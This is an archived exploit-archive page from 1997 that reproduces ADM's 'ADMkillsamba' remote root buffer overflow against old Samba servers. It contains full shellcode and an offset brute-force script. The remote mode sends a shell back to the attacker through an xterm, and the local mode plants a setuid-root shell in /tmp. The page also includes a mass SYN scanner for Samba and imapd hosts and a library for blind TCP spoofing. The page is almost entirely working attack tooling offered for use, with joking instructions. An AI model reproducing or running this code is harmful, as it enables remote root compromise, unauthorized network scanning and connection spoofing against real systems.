Samba Remote buffer overflow

Summary
Description:Samba reads in a user's password into a fixed length buffer, allowing execution of arbitrary code on the target machine
Author:ADM
Compromise: root (remote)
Vulnerable Systems:Those running the SAMBA SMB server versions earlier than 1.9.17p2. The exploit is for Linux/X86
Date:26 September 1997
Notes:ADM send me this before it went out on Bugtraq, and then they sent me a newer version (appended). Thanks!
Details

Date: Fri, 26 Sep 1997 22:08:29 +0200
From: root <root@ADM.kix-azz.org>
To: fyodor@nmap.org

[ Message Cut ]

/*                    ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
                   |  ---  |  |       /   |  |   |  |
                   '''   '''   '''''''    ''''   ''''        

  ADMkillsamba ver 0.2  argh ADM back again ! :)))                        
  whats new ?: i have include a krad help & a  verry Fast utility for found 
  smbserver  <note: u can use it for found imapd :)> ; a script shell for make
  brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)                                  
  the buffer have a better structure <4 a better world ??> & option for local
  sploit :) cya ppl 
  admsmb@hotmail.com  <note: is only for smbd sploit ! ADM have no email etc */



/*                    ADMkillsamba-v0.2.c                             */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
                              
unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";
                

void main(int argc, char *argv[]) {
  FILE *filez;
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  char netbios_name[100];  
  char bufferz[255];
  char ipz[40];
  char myipz[40];
  unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
  int *ret;
  unsigned char  cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
  unsigned char arg1[50];
  int i;
  
  bzero(netbios_name,100);
  bzero(bufferz,255);
  bzero(ipz,40);
  bzero(ipz,40);
     
  if(argc <3){
  printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
  printf("<ip of victim> = 11.11.11.11  ! THe numerical IP  Only ! not www.xxx.cc !\n");
  printf("<netbios name> = VICTIME    for get the netbios name use ADMnmbname or ADMhack\n");
  printf("<your ip> = the sploit send a xterm to your machine heh \n");
  printf("option:\n");
  printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
  printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
  printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
  printf(" HaVe Fun\n");
  exit(0);
  }
  
  if(*(argv[1]+0)=='R'){
  printf("Remote sploit\n");  
  sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);    
  shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
  bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);   
  if (argc > 5) bsize  = atoi(argv[5]);
  if (argc > 6) offset = atoi(argv[6]);     
  strcat(shellcode,cmd);
  strcat(shellcode,arg1); 
  strcat(shellcode,bla);
  strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
  strcpy(ipz,argv[2]);                   /* haha u can overflow my sploit :) */
  strcpy(netbios_name,argv[3]); 
  }
  
  if(*(argv[1]+0)=='L'){
  printf("Local sploit\n");
  strcpy(shellcode,localshell);
  strcpy(netbios_name,argv[2]);
  strcpy(ipz,"127.0.0.1");
  filez=fopen("/tmp/IK","w+");
  fprintf(filez,"#!/bin/sh\n");
  fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
  fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
  fflush(filez);
  fclose(filez);
  system("chmod a+x /tmp/IK");  
  }
  
  
  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);

 
  addr =  0xbffffff0 - offset ;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
         
   
 }

--------------------------------small help------------------------------------

ADMsmb HELP  v0.1

( a krad help  =) )

Q: why the sploit gimme alwais the msg Broken pipe  ???
A: ok diz msg  appear when you  have not the  good buffer_size/offset value
   yes diz param change on every machine ! u must found it! for that try 
   a brutal force on the  buff/offset  see the script :) 


-------------------------------Brutal Force-----------------------------------
#!/bin/sh
declare -i D
declare -i OFF
declare -i try 
declare -i BUFF
BUFF=3081                     # buffer size
while true
do
D=1000                        # offset
while test "$D" -lt 8000
do
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo 
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------



Q: what is the best param for buff/offst .?
A: first try with  diz  param  buffer=3081 offset=3500  if is dont work try
   to change the offset size 1000 at 8000 if he dont run try buff size 3075
   at 3090 i know its hard but with experience its simple =)

Q: how to found the buff size ??
A: simple !  launch ADMkillsamba  with  buff/size=1000 if the srv dont make
   a broken pipe the buffer was to small try by step of 100 when the srv
   give u a broken pipe ; try to see the precise value ! and make a scan on
   it =)  

ex:  buff = 3000 no broken pipe
     buff = 3100 broken pipe
     buff = 3050 no broken pipe
     buff = 3070 broken pipe             < scan to 3070 at 3100


Q: the offset size ?? 
A: Scan it :)

 
PS: if u found a offset &  buff/size on a system plz send it i'am gonna make
a list of the most curently buff/size 

PPS: if u wanna code a char shell for a other OS mail me !

news: ADM gonna make a home page for diz sploit dont forget to see it for
more helps tips/etc     

cya

--------------------------------------------------------------------------------
the utility for search smbserver [ u can use it for imapd =) ]

/*******************************************************************/
/* ADM imap/smb scanner the BEST of §THE WORLD ! =] by DA ADM crew */    
/* he needs the output of a host -l target >filez  for   run       */
/* USAGE is SIMPLE !  ADMimap <host filz> <your ipZ> <delay>       */
/*******************************************************************/
/* VERSION:  1.2                                                   */
/* CoDeuRz:  a  CoDeuRz of ADM                                     */
/* Greeeetzzzzzz: ADM & HeiKe & some guyz on ***.*******.***       */
/*******************************************************************/
 
#include <stdio.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include "ADM-spoof.c"

 host2ip(char *serv)
{
   struct sockaddr_in sinn;
   struct hostent *hent;
      
  hent=gethostbyname(serv);
  if(hent == NULL) return 0;
  bzero((char *)&sinn, sizeof(sinn));
  bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
  return sinn.sin_addr.s_addr;
 }


int raw_send,raw_tcp;


                     
main(int argc, char **argv)
{
struct sockaddr_in recv_dst;
unsigned long da_ip;
char buffer[4096],reply[256];
char buffer2[20];
char sern[20];
int on=1,off=0,verbose=1,goout=0,goin=0,timez2=0,autotime=0,regular=10;
int i=0,j,resu,n,len,auto3,timez=8,max_try=2;

FILE *log;
FILE *IPSRC;
FILE *HOSTF;
pid_t pid;
int portz;
unsigned long int nip;
struct iphdr *ip=(struct iphdr*)buffer;
struct tcphdr *tcp=(struct tcphdr*)(buffer+IPHDRSIZE); 

HOSTF=fopen(argv[2],"r");
IPSRC=fopen("IPSRC","w+");
IPFILEZ(HOSTF,IPSRC);
fclose(HOSTF);
rewind(IPSRC);

 
printf("ADMfindall ver 1.2 (c) ADM\n");
if(argc<4){
printf("\nusage: ADMimap <yourIP> <IP file> <delay> [ S-I ]\n");
printf("\n<yourIP> = ADMimap needs your IP for make the scan\nbut u can scan with www.nasa.gov if u want ;))\n");
printf("<IP file>  = the filez of ip u want scan\ntry a :# host -l nasa.gov > ipfilez for scan ALL nasa.gov\n");
printf("<delay>    = define the delay in second for waiting the ACK type 0 for auto\n");
printf("[S-I]      = S == scan 4 Samba I ==  scan 4 imapd\n");
exit(0);
}                   
  
  if(*(argv[4]+0)=='S')
     {                	               
     portz=139;
     strcpy(sern,"Samba");
     }
     else
     {
     portz=143;
     strcpy(sern,"Imapd");
     }

	log=fopen("ADMFIND.LOG","w");
	if (log==NULL) {
		perror("fopen");
		exit(1);
	}
	
	
	raw_send=socket(AF_INET, SOCK_RAW, 255);
	if(raw_send == -1) {
		printf("cant open raw socket for sending\n");
		exit(1);
	}
	raw_tcp=socket(AF_INET ,SOCK_RAW ,6);
	
	if (raw_tcp == -1) {
		printf("can't open raw socket for receiving\n");
		exit(1);
	}
	
	ioctl(raw_tcp,FIONBIO,&on);

	
 

if(timez2=atoi(argv[3]) == 0)
  {
  auto3 = 1;
  printf(" AUTO ON ! \n");
  }
else{timez2=atoi(argv[3])*50;}

for(;;){
	               
	               if(!feof(IPSRC)){
		        fscanf(IPSRC,"%s",buffer2);
		        printf(" sendto %s\n",buffer2); 
		        autotime++;
		        send_pkt(raw_send,host2ip(argv[1]),host2ip(buffer2),
		        2666,portz,TH_SYN,111,111,0,NULL,0);
	                          }
	 if(feof(IPSRC))goout=3;
	  
	 
	 if(goout>1){
	  usleep(1);
	  goin++;
	  }                        
	 
	
	if(auto3==1){ 
	 
	 if(goin > autotime*regular )
	    {
	    fclose(log);
	    exit (0); 
	  }    
	}                       
	
	else{
	   
	   if(goin > timez2){ 
	    fclose(log);
	     exit(0);} 
	   
	   }
	                         
	buffer[0]='0';	
	get_pkt(raw_tcp,buffer,400);
	

	if(buffer[0]!='0'){
         
	   if(tcp->th_dport == htons(2666)){
           
	      if(tcp->th_sport == htons(portz)){
	      
	                           resu= (tcp->th_flags |  TH_ACK) ;
	                                     
	                                     if(resu==18)
	                                      { 
	                                      fprintf(log,"%s on %s\n",sern,inet_ntoa(ip->saddr));
	                                      printf("%s on %s\n",sern,inet_ntoa(ip->saddr));
	                                      fflush(log);     
	                                      }
	       
	       }
	    }               
	 }  
      }

	
printf(" ALL IP WAS LOGED on ADMFIND.LOG !\n");

fclose(log);

} 
           


-------------------------------[ADM-spoof.c]----------------------------------
	 u need diz include for ADMfindall.c                                     
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

/************************************************************************/
/*  ADM spoofing include  ver 1.4                                       */
/************************************************************************/
/*  READ THE ADM-spoof.what.news for more info !                        */
/************************************************************************/
/************************************************************************/
/*                  EnJoY AdM SOurceZzzzZzz                             */  
/************************************************************************/
/* hey hotlame & co dont read diz src u are so l33t for this MOUHAHAHAHA*/
/************************************************************************/
  
#define IPHDRSIZE   sizeof(struct iphdr  )
#define ICMPHDRSIZE sizeof(struct icmphdr)
#define TCPHDRSIZE  sizeof(struct tcphdr )
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)
#define UDPHDRSIZE   sizeof(struct udphdr)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>
#include <netinet/udp.h>

/*****************************************************************************/
/* structure of the pseudo header                                            */
/*****************************************************************************/

 struct pseudohdr{
  unsigned long saddr;
  unsigned long daddr;
  char     useless;
  unsigned char protocol;
  unsigned int leng;
   };
struct nnn{
u_long ip;
}myip;
                                                                
struct s_hdr{
__u32 s_ack:32;
__u32 s_seq:32;
__u32 s_da_ip:32;
__u32 s_ip:32;
__u16 s_sport:16;
__u16 s_dport:16;
}spoof_hdr;



#ifdef SYSV
#define bcopy(s1,s2,len) memcpy(s2,s1,len)
#endif

/*****************************************************************************/
/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 *  pinched from the a  rfc ( cheksum calcul ) 
 */
/*****************************************************************************/

unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

 
/****************************************************************************/
/*                  SEND A PAKET TCP !                                      */
/*
 
 usage: send_pkt(socket , ip of source , ip of dest , source port, dest port,
                 flags, seq_num, ack_num, window size , *data , size of data); 
                                                                            */
/****************************************************************************/                  


send_pkt(int s,
        unsigned long s_ip,
        unsigned long d_ip,
        unsigned int  s_port,
        unsigned int  d_port,
        unsigned char flags,
        unsigned long seq_num,
        unsigned long ack_num,
        unsigned int  winsize,
        unsigned char *data,
        unsigned int  data_size 
        )

{
   struct   sockaddr_in sin_dst;
   struct   iphdr       *ip;
   struct   tcphdr      *tcp;
   struct   pseudohdr   *pseudo;
   unsigned char        *DATA;
   unsigned char        packet[2048];
   
   ip     = (struct iphdr      *)packet;
   pseudo = ( struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
   tcp    = (struct tcphdr     *)(packet+IPHDRSIZE);
   DATA   = (unsigned char     *)(packet+IPHDRSIZE+TCPHDRSIZE);
   
   memset(packet,0,2048);                     
   memcpy(DATA,data,data_size);                                 
                                                 
	 pseudo->saddr = s_ip;
	 pseudo->daddr = d_ip;
	 pseudo->useless = 0;
	 pseudo->protocol = 6;
         pseudo->leng = htons(TCPHDRSIZE+data_size);
	                         
	tcp->th_sport=htons(s_port);
	tcp->th_seq=htonl(seq_num);
	tcp->th_ack=htonl(ack_num);
	tcp->th_off=5;
	tcp->th_flags=flags;
	tcp->th_win=htons(winsize);
	
	tcp->th_urp=0;     
        tcp->th_dport=htons(d_port );
        tcp->th_sum=0;
        tcp->th_sum=in_cksum(pseudo,TCPHDRSIZE+PSEUDOHDRSIZE+data_size);
                 
        memset(packet,0,IPHDRSIZE);
            
        ip->saddr    =  s_ip;
	ip->daddr    =  d_ip;
	ip->version  = 4;
	ip->ihl      = 5; 
	ip->ttl      = 245;
	ip->protocol = 6; 
	ip->tot_len  = htons(IPHDRSIZE+TCPHDRSIZE+data_size);
	ip->tos      = 0;
	ip->id       = random()%1256;
	ip->frag_off = 0;
	ip->check    = in_cksum(packet,IPHDRSIZE);
        	
        sin_dst.sin_addr.s_addr = ip->daddr;
        sin_dst.sin_family = AF_INET;     
        
	sendto(s,packet,IPHDRSIZE+TCPHDRSIZE+data_size,0,
        (struct sockaddr *)&sin_dst,sizeof(struct sockaddr)); 
       	

}


/*****************************************************************************/
/*                       SEND A UDP PACKET                                   */
/* usage: udp_send( socket, addr of source , addr of dest, port source ,     */
/*         port of dest, *data , size of data);                              */
/*****************************************************************************/

 int udp_send(int s,
                      unsigned long  s_addr,
                      unsigned long  d_addr,
                      unsigned short s_port,
                      unsigned short d_port,
                      char           *datagram,
                      unsigned       datasize)
{

struct sockaddr_in sin;
struct iphdr     *ip;
struct pseudohdr *pseudo;
struct udphdr    *udp;
unsigned char    *data;
unsigned char packet[1024];
 

  ip     = (struct iphdr     *)packet;
  pseudo = (struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
  udp    = (struct udphdr    *)(packet+IPHDRSIZE);
  data   = (unsigned char    *)(packet+IPHDRSIZE+UDPHDRSIZE);
       
memset(packet,0,1024);

        pseudo->saddr=s_addr;
        pseudo->daddr=d_addr;
        pseudo->useless=0;
        pseudo->protocol=17;
        pseudo->leng=htons(UDPHDRSIZE+datasize);
         	
	udp->source  = htons(s_port); 
	udp->dest    = htons(d_port);
	udp->len     = htons(UDPHDRSIZE+datasize);
	memcpy(data,datagram,datasize);
	udp->check    = 0;         
	udp->check   = in_cksum(pseudo+PSEUDOHDRSIZE+UDPHDRSIZE+datasize);
        memcpy(data,datagram,datasize);
        
        memset(packet,0,IPHDRSIZE);
        
        ip->saddr    = s_addr;
        ip->daddr    = d_addr;
        ip->version  = 4;
        ip->ihl      = 5;
        ip->ttl      = 255;
        ip->id       = random()%5985;
        ip->protocol = 17;
        ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE+ datasize);
        ip->check    = 0;
        ip->check    = in_cksum((char *)packet,IPHDRSIZE);
                                                                        
                                                                        

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr=d_addr;
	sin.sin_port=udp->dest;

        return sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, 
        		(struct sockaddr*)&sin, sizeof(struct sockaddr));

}


/****************************************************************************/
/*                     SEND A ICMP PACKET                                   */
/*    hehe ripped from ADMscan2 :)                                          */
/****************************************************************************/
/* IN TEST !!!!!!!

int icmp_echo(int s,unsigned long int src, unsigned long int dest,int id,int seq,
		char* data, unsigned int datasize) 
{
struct iphdr   *ip;
struct icmphdr *icmp;
unsigned char *icmpdata;
unsigned char *packet;
struct sockaddr_in sin_dst;
int n;

	packet=(char*)malloc(IPHDRSIZE +ICMPHDRSIZE+datasize+1);
	if (packet==NULL) {
		puts("malloc error");
		return -1;
	}
	ip = (struct iphdr *)packet;
	icmp = (struct icmphdr *)(packet+IPHDRSIZE);
	icmpdata = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE);

	ip->saddr    = src;
	ip->daddr    = dest;
	ip->version  = 4;
	ip->ihl      = 5;
	ip->ttl      = 255;
	ip->protocol = 1;
	ip->tot_len  = htons(IPHDRSIZE +ICMPHDRSIZE+datasize);
	ip->tos      = 0;
	ip->id       = 0;
	ip->frag_off = 0;
	ip->check    = 0;
	ip->check    = in_cksum(ip,IPHDRSIZE);

	icmp->type   = 8;
	icmp->code   = 0;
	icmp->checksum = 0;
	icmp->un.echo.id  = id;
	icmp->un.echo.sequence = seq;
	memcpy(icmpdata,data,datasize);
	icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+datasize);

	sin_dst.sin_addr.s_addr = ip->daddr;
	sin_dst.sin_family = AF_INET;

	n=sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE+datasize,0,
		(struct sockaddr*)&sin_dst,sizeof(struct sockaddr));
	if (n==-1) puts("sendto error");
	free(packet);

}

*/

/****************************************************************************/
/*                TEST IF  A HOST IS ALIVE                                  */
/*                                                                          */
/****************************************************************************/ 

/*****************************************************************************/
/*                     RECV PAKET                                            */
/* get_pkt(socket, *buffer , size of the buffer);                            */
/*****************************************************************************/
get_pkt(int s,unsigned char *data,int size)
{
struct sockaddr_in sin;
int len,resu;
len= sizeof(sin);
resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
return resu;
}        

/*****************************************************************************/
/*                     GET THE SEQ NUMBER                                    */
/*****************************************************************************/

unsigned long get_seq(unsigned long s_ip, unsigned long d_ip,unsigned int  s_port)

{
struct   sockaddr_in  sin;
struct   tcphdr       *tcp;
struct   iphdr        *ip;
unsigned char         data[400];
         int          s,i,s_r,S_port,timeout=0,on=1;
unsigned long         ack_num=0;

ip  = (struct iphdr  *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
memset(data,0,399);
S_port = random()%1000;
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);
ioctl(s_r,FIONBIO,&on);
ioctl(s,FIONBIO,&on);

   
 #ifdef IP_HDRINCL
 setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
 #endif 

send_pkt(s,s_ip,d_ip,S_port,s_port,TH_SYN,1234,0,512,NULL,0);

while(timeout<280){

       get_pkt(s_r,data,398);
              
              if(ip->saddr==d_ip){
                if(tcp->th_dport == htons(S_port) ){ 
                   if(tcp->th_sport == htons(s_port)){
                      if(tcp->th_flags & TH_ACK)
                      {                          
                       printf(" SeQ numa Is %lu \n" , ntohl(tcp->th_seq));
                       ack_num=ntohl(tcp->th_seq);
                       break;
                       } 
                     }
                   } 
                 }
          usleep(10000);
          timeout++;
           }
close(s);
close(s_r);
return ack_num;
} 

/*****************************************************************************/
/*                     PORT PROBER                                           */
/* usage:  pprobe(ip of desti , port ,flagz )                                */        
/*****************************************************************************/

pprobe(unsigned long da_ip, 
       unsigned short int port,
       int flagz )
{
struct   sockaddr_in  sin;
struct   tcphdr       *tcp;
struct   iphdr        *ip,*ipr;
unsigned char         data[400];
unsigned char         datar[400];
int          s,i=1,s_r,resu,timeout=0,sicmp,on=1;
ip  = (struct iphdr  *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
ipr = (struct iphdr *)data;

memset(data,0,399);
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);
sicmp=socket(AF_INET,SOCK_RAW,1);
ioctl(s_r,FIONBIO,&on);
ioctl(sicmp,FIONBIO,&on);
         
#ifdef IP_HDRINCL
setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
#endif
            
send_pkt(s,myip.ip,da_ip,2669,port,flagz,1234,0,512,NULL,0);
resu = -1;

while(timeout<80){

data[0]='0';
datar[0]='0';
usleep(100000);

timeout = timeout + 1;

get_pkt(s_r,data,399);
get_pkt(sicmp,datar,399);

if(datar[0]!='0')
   {
   resu = -1;
   printf("ICMP!\n");
   goto fin;
   }

if(data[0]!='0'){

       if(ip->saddr==da_ip){
           if(tcp->th_dport == htons(2669) ){
              if(tcp->th_sport == htons(port)){
                resu= (tcp->th_flags |  TH_ACK) ;
                  
                  if(resu==18)resu = 0;    
                  if(resu==20)resu = -1;
                 break;   
               }
             }
         }     
     }
 }

fin:
if(timeout > 79) printf(" Time Out");

close(s);
close(s_r);
close(sicmp);
return resu ;
}          

                                                                               
/****************************************************************************/
/*                       UDP PORT PROBBER                                   */
/* usage: Upprobe( ip of dest , port)                                       */
/****************************************************************************/
/*  bha dont work fine */
Upprobe(unsigned long da_ip, unsigned short int port )

{
struct   sockaddr_in  sin,sin_dst;
struct   icmphdr      *icmp;
struct   iphdr        *ip;
unsigned char         data[400];
int          s,i=1,s_r,resu;
ip  = (struct iphdr  *)data;
icmp = (struct icmphdr*)(data+IPHDRSIZE);
memset(data,0,399);

s=socket(AF_INET,SOCK_DGRAM,17);
ioctl(s,FIONBIO,&i);

sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(port);
sin_dst.sin_addr.s_addr = da_ip;
sendto(s,NULL,0,0,(struct sockaddr *)&sin_dst,sizeof(sin_dst));
s_r=socket(AF_INET,SOCK_RAW,1);
i=1;
ioctl(s_r,FIONBIO,&i);
          
resu=-1;  

for(;;){
data[0]='0';
get_pkt(s_r,data,399);
if(data[0]!='0')
{ 
 printf(" ???\n");
    
   if(ip->saddr==da_ip)
   {
     
     if(ip->protocol==1)
     {
        
       resu = 0;     
       goto fin;
     }
     else
        {
        resu = -1;
        }   
        }
  }
}
fin:
return resu;

} 
         
/****************************************************************************/
/*                     MakE A sPOoF ConnEction                              */
/*                                                                          */
/* usage(socket,sourceIP,Destination IP ,port SOurce, port Dest,ipofurhost) */
/****************************************************************************/

Sconnect(int s,
         unsigned long  s_ip,
         unsigned long  d_ip,
         unsigned short int s_port,
         unsigned short int d_port,
         unsigned long   myhost)

{ 

int    loop;
spoof_hdr.s_seq   = 1;
spoof_hdr.s_da_ip = d_ip;
spoof_hdr.s_ip    = s_ip;
spoof_hdr.s_sport = s_port;
spoof_hdr.s_dport = d_port;

spoof_hdr.s_ack = get_seq(myhost,d_ip,d_port);
send_pkt(s,s_ip,d_ip,s_port,d_port,TH_SYN,spoof_hdr.s_seq,1,512,NULL,0);

for(loop=1;loop<4;loop++)
{

spoof_hdr.s_seq=spoof_hdr.s_seq;
printf(" spoof ack +64000*%i+1 =%lu \n",loop,spoof_hdr.s_ack+(64000*loop)+1);
send_pkt(s, s_ip ,d_ip ,s_port,d_port,TH_ACK,spoof_hdr.s_seq=spoof_hdr.s_seq+1,spoof_hdr.s_ack+(64000*loop)+1,14360,NULL,0); 
}


}
/*****************************************************************************/
/*               Spoofed Write  ( need Sconnect before )                     */
/* usage:  Swrite (socket, *data , sizeofdata );                                    */
/*****************************************************************************/


Swrite(int s, u_char *data, int size )

{
int loop;

for(loop=1;loop<4;loop++)
{
send_pkt(s,spoof_hdr.s_ip,spoof_hdr.s_da_ip ,
           spoof_hdr.s_sport,spoof_hdr.s_dport,
           (TH_PUSH|TH_ACK),spoof_hdr.s_seq,spoof_hdr.s_ack+(64000*loop)+1,
           14360,data,size);
}
spoof_hdr.s_seq=spoof_hdr.s_seq+size;


}   
/*****************************************************************************/
/*           Test If a Host Is SPoofable                                     */
/* usage: Stest (myhost,ip dest , port of dest);                             */
/*****************************************************************************/
/* lame test =) */
Stest( unsigned long myhost, unsigned long ip_d , unsigned short  d_port)
{
u_long resu,R;
u_long resu1,R1;
u_long resu2,R2;
u_long resu3,R3;
int done = -1;


resu  = get_seq(myhost,ip_d,d_port);
resu1 = get_seq(myhost,ip_d,d_port);
resu2  = get_seq(myhost,ip_d,d_port);
resu3  = get_seq(myhost,ip_d,d_port);


if(resu1-resu==64000 || resu1-resu == 128000) done=0;

if(resu3-resu2==64000|| resu3-resu2== 128000) done=0;
 
return  done;

}

/****************************************************************************/
/*    get only the IP frome a host -l ouput filez                           */
/* usage: IPFILEZ( *the src filez, *the output filez);                      */
/****************************************************************************/

IPFILEZ(FILE *DA,FILE *trace)
{
char ipz[256];
int oki;

while(!feof(DA))
 {                
   fscanf(DA , "%s", ipz );  
      
    if(strstr(ipz,"u") == 0 )
      {
             if(strstr(ipz,"y") == 0)
                {
                      if(strstr(ipz,"e") == 0)
                         {
                               if(strstr(ipz,"g") == 0)
                                 {
                                        if(strstr(ipz,"i") == 0)
                                          {
                                                 if(strstr(ipz,"a") == 0)
                                                          {
                                                           if(strstr(ipz,"o") == 0)oki=1;
                                                           }
                                          }
                                   }
                          }
                 }
          }      
      
      if(oki==1)
        {  
        fprintf( trace , "%s\n" , ipz );
        fflush(trace);
        oki=0;
        }
          
       if(feof(DA))break;
        
    }

 }
 
 /****************************************************************************/
 /*     make a Scan Port on a plage of port                                  */
 /*  Scan2( *int input,int*output,size of *);                                */
 /****************************************************************************/

Scan2(int *ptr,int *outptr,int Size,int flagz , u_long da_ip)
{ 
struct   sockaddr_in  sin;
struct   tcphdr       *tcp,*tcpr;
struct   iphdr        *ip,*ipr;
unsigned char         data[400];
unsigned char         datar[400];

int          s,i=1,s_r,resu,timeout=0,try=0,on=1;
ip  = (struct iphdr  *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
ipr = (struct iphdr *)datar;
tcpr= (struct tcphdr *)(datar+IPHDRSIZE);

memset(outptr,0,(Size/2));
memset(data,0,399);
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);

ioctl(s_r,FIONBIO,&on);



         
#ifdef IP_HDRINCL
setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
#endif
            

while(timeout<540){

data[0]='0';
datar[0]='0';
usleep(10000);

timeout = timeout + 1;

if(try<Size)
 {
if(*(ptr+try) != 0)
    { 
send_pkt(s,myip.ip,da_ip,40000-try,*(ptr+try),flagz,1234,0,512,NULL,0);
    }
}

get_pkt(s_r,datar,399);

if(datar!='0'){
  if(ipr->saddr==da_ip){
     if( ntohs(tcpr->th_dport) > 39000 ){   
        resu= (tcpr->th_flags |  TH_ACK) ;
               if(resu==18){
               *(outptr+(40000-ntohs(tcpr->th_dport)))=1;
               printf(" the Port %i is open :)\n",ntohs(tcpr->th_sport));
               resu=0;
               datar[0]='0';
               }
         }     
      }
   } 
try++;
 }   
}                                                                        

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: